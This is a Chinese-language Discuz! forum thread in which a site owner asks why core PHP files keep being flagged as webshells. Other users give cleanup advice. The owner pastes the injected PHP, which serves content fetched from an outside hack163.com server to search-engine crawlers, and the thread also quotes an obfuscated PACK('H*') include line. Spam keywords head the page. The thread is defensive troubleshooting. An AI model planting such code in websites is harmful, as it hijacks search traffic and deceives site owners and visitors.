97久久国产亚洲精品超碰热,成人又色又爽的免费网站,色偷偷女人的天堂a,男女高潮喷水在线观看,国内精品一线二线三线区别在哪里

Discuz! 官方交流社區(qū)

標(biāo)題: 兩個文件總是提示為WEBSHELL [打印本頁]

作者: 9axl    時(shí)間: 2020-9-26 20:49
標(biāo)題: 兩個文件總是提示為WEBSHELL
警告 index.php文件為webshell;警告 portal.php文件為webshell;官方文件剛替換查殺也提示。后臺檢測也沒有文件被修改。

作者: allthebest    時(shí)間: 2020-9-27 01:46
若存在,處理前,先卸載所有盜版插件與模版。

進(jìn)discuz后臺找到工具-文件校驗(yàn),看下最近有哪些php文件被修改了。

1、排查網(wǎng)站源文件的php 文件,查看是否有出現(xiàn)IP地址、或者異常網(wǎng)站(上面跳轉(zhuǎn)的網(wǎng)站),如果有刪除就可以了。

2、排查網(wǎng)站源文件的php 文件,查看是否有如下代碼:@include($_SERVER['DOCUMENT_ROOT']

(排查一般用WEBshell后門掃描軟件掃描核查?。?br />
如果有就刪除此段代碼。并把該段代碼進(jìn)行解密。

舉例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));

需要解密的代碼為:2F646174612F6176617461722F30

解密后為:/data/avatar/0

代碼解密地址:http://www.bejson.com/convert/ox2str/


意思就是在上述路徑下存在被非法上傳的文件,用于做快照劫持。

解決辦法:刪除上面的代碼和文件即可。

掛馬問題解決了后,記得更改服務(wù)器相關(guān)的各種密碼,盡量設(shè)置的復(fù)雜一點(diǎn)。

作者: 9axl    時(shí)間: 2020-9-27 13:08
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false||strpos($key,strtolower('Yahoo'))!== false||strpos($key,strtolower('bingbot'))!== false )
{
date_default_timezone_set('PRC');
$TD_server = "http://www.hack163.com/shou/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;
}


?>
在這幾個文件中加入了這樣一段代碼。
作者: crx349    時(shí)間: 2020-9-27 13:57
打開看看 是否被改了 對比官方文件
作者: crx349    時(shí)間: 2020-9-27 13:58
9axl 發(fā)表于 2020-9-27 13:08
在這幾個文件中加入了這樣一段代碼。

典型的掛馬了
作者: 9axl    時(shí)間: 2020-9-28 10:02
空間商技術(shù)人員說是DZ程序漏洞,被注入。
作者: crx349    時(shí)間: 2020-9-28 11:39
9axl 發(fā)表于 2020-9-28 10:02
空間商技術(shù)人員說是DZ程序漏洞,被注入。

我可以反過來說 空間商空間有漏洞被注入了嗎

空間商甩鍋啊 要解決 而不是推卸責(zé)任
作者: allthebest    時(shí)間: 2020-9-28 18:47
9axl 發(fā)表于 2020-9-28 01:02
空間商技術(shù)人員說是DZ程序漏洞,被注入。

不負(fù)責(zé)任空間,及早備份搬家去。
作者: czwhehehe    時(shí)間: 2020-9-28 22:18
crx349 發(fā)表于 2020-9-28 11:39
我可以反過來說 空間商空間有漏洞被注入了嗎

空間商甩鍋啊 要解決 而不是推卸責(zé)任 ...

真不怪空間商,說白了你就是用盜版插件或者模板造成的
作者: 9axl    時(shí)間: 2020-9-29 13:17
現(xiàn)在我將網(wǎng)站里面的所有文件都移到一個新建的OLD文件夾里,然后,全新上傳了3。4,現(xiàn)在看看有怎樣的結(jié)果。
作者: 9axl    時(shí)間: 2020-9-29 13:23

以下幾個文件怎么提示是未知的文件?
static/js/player

aplayer.min.js.map
172,191 Bytes
2020-9-29 12:58
dplayer.min.js.map
311,619 Bytes
2020-9-29 12:58
aplayer.min.css.map
21,373 Bytes
2020-9-29 12:58
dplayer.min.css.map
71,287 Bytes
2020-9-29 12:58
flv.min.js.map


作者: 9axl    時(shí)間: 2020-9-29 13:25
全部是新上傳的文件,提示:警告 index.php文件為webshell




歡迎光臨 Discuz! 官方交流社區(qū) (http://r615.cn/) Powered by Discuz! X5.0